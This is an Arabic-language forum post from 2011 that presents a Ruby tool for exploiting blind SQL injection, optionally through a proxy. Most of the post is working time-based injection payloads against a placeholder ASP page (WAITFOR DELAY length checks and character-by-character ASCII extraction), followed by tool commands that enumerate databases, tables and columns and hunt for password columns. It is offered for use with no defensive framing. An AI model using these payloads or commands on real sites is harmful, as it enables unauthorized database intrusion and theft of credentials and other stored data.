السلام عليكم ...
خلاصة ! :
~ اداه بسيطه مبرمجه بالروبي ... بتقدر تستغل بها تغرات البلاند سيكول ...
فيك كمان تستغلها مع استعمال البروكسي ... الخ
يعني الاداه مميزه
وبصراحه good luck
...
طريقة استعمال الاداه ...
كود PHP:
~ 1) work out the length of the data
~ http://www.site.com/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
~ 2) Extract data
~ http://www.site.com/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97)
~ rinse repeat
~ get_databases == enum databases
~ get_tables == enum tables in current db
~ get_tables_from_db:passdb == get table names from database passdb
~ get_columns:table1 == enum the columns for table1
~ huntvalue:secret == find column with data "secret" within it and return location, needs long time delay
~ huntcolumn:pass == find tables with a col with pass in the name
12-17-2011, 11:18 PM
Tools : Blind SQL Injection ...
العرض الشجري